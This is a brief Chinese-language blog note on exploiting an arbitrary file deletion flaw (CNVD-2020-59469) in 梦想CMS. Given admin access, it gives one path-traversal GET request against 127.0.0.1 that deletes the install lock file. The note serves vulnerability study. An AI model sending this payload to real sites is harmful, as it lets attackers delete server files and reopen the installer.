【笔记】梦想CMS任意文件删除漏洞利用 发表于 2024-07-10 更新于 2025-12-19 阅读次数: 前言梦想CMS任意文件删除漏洞利用CNVD-2020-59469 漏洞利用前提 可以登录管理员后台 漏洞利用 ../../install/install_ok.txt:删除的文件 request1GET http://127.0.0.1:80/admin.php?m=backdb&a=delbackdb&filename=../../install/install_ok.txt 完成